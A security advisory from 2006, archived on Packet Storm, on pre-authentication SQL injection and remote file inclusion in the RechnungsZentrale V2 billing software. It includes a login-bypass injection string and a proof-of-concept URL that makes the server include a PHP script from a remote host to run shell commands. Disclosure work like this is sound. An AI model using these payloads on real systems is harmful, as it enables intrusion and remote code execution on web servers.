what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

rz2-adv

rz2-adv
Posted Apr 28, 2006
Authored by GroundZero Security | Site GroundZero-Security.com

RechnungsZentrale v2 suffers from SQL Injection and Remote File inclusion Vulnerabilities.

tags | advisory, remote, vulnerability, sql injection, file inclusion
SHA-256 | 199f60d5a50ae67e551c0a6e37b12a5cd7446cbdbfe0fa75e2ffcebfaec62501

rz2-adv

Change Mirror Download
----------------------------------------------------------------------------------
- GroundZero Security Research and Software Development 2006 -
----------------------------------------------------------------------------------
- -
- Security Advisory regarding RechnungsZentrale v2. -
- SQL Injection and Remote File inclusion Vulnerabilities. -
- Released: Tue Apr 18 18:00:00 CEST 2006 -
- -
----------------------------------------------------------------------------------



----------------------------------------------------------------------------------
- Affected: -
----------------------------------------------------------------------------------

Software:RechnungsZentrale V2
Version:1.1.3, likely older versions are affected aswell.
Vendor: http://www.nfec.de/


----------------------------------------------------------------------------------
- Information: -
----------------------------------------------------------------------------------

"RechnungsZentrale V2 is a multiuser, Web-based billing application.
It facilitates the creation of bills and the management of customers.
It is written in PHP and uses MySQL. It supports German, English, French,
and Dansk languages."

The Software contains vulnerabilities which allow an Attacker to conduct
SQL injection and Remote File inclusion Attacks prior to Authentication.

The SQL injection vulnerabilitie exists in the login script (authent.php4) and
allows an Attacker to log into the internal Interface or execute malicious
SQL commands.

PoC:
User: ' OR '1'='1
Password: 1


In the same script it is possible to include a remote php by pointing the
"rootpath=" option to a remote PHP script with a system() or passthru() function.

Doing so would allow an unauthenticated Attacker to execute shell commands with
permissions of the Web Server.

PoC:
http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4


----------------------------------------------------------------------------------
- Vendor Response: -
----------------------------------------------------------------------------------

Notified: Tue Apr 18 16:12:14 CEST 2006
Response: Tue Apr 18 17:13:14 CEST 2006
(Development Discontinued)
Disclosure:Tue Apr 18 18:00:00 CEST 2006


----------------------------------------------------------------------------------
- Bugs discovered by GroundZero Security Research and Software Development -
- http://www.GroundZero-Security.com | Http://www.g-0.org -
----------------------------------------------------------------------------------
Advisory verified by Secunia.
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close